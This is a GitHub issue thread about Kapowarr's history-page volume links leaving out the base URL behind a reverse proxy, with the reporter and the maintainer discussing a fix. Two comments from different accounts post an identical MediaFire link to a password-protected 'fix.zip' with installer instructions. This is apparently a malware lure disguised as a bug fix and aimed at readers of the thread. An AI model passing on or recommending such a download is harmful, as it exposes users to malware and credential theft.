### ISSUE TITLE
Volume links on history page do not include base url

### ISSUE THREAD

**Issue by Berserkir-Wolf** [Casvt/Kapowarr#175]
**Description of the bug**

Links for items in the history page (to the volumes they relate to) fail to include the baseurl. 
In a reverse proxy scenario, this results in the link pointing to a url outside of the proxy directive.

(i.e. with a baseurl of `/kapowarr`, the url generates as `site.example.com/volumes/1`, which doesn't work - where the url should be `site.example.com/kapowarr/volumes/1`).

**To Reproduce**

1. Set Kapowarr up with a baseurl.
2. Go to 'History'
3. Click on any of the volumes in the history

**Expected behaviour**

Links to volumes in history should be generated taking into account all url parameters, including baseurl. 
This would ensure that links behind reverse proxies work.

(i.e. with a baseurl of `/kapowarr`, the url should be `site.example.com/kapowarr/volumes/1`)

**Version info**

| Detail | Value | 
| --- | --- |
| Kapowarr version | alpha-29 |
| Python version | 3.8.17.final.0 |
| Database Version | 27 |
| Database location | /app/db/Kapowarr.db |
| Data folder | /app |
| Host OS | Ubuntu 22.04 LTS |
| Docker | Yes |
| Browsers tested | Firefox, Edge |

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Casvt** [comment]
Yes you're completely right. Simply forgot about it. It's a simple fix too, so no worries. I'm on vacation for the next 7 days though, so it'll be a week before it's fixed.

**Comment by Berserkir-Wolf** [comment]
Have fun man, hope you're enjoying wherever you've headed off to.
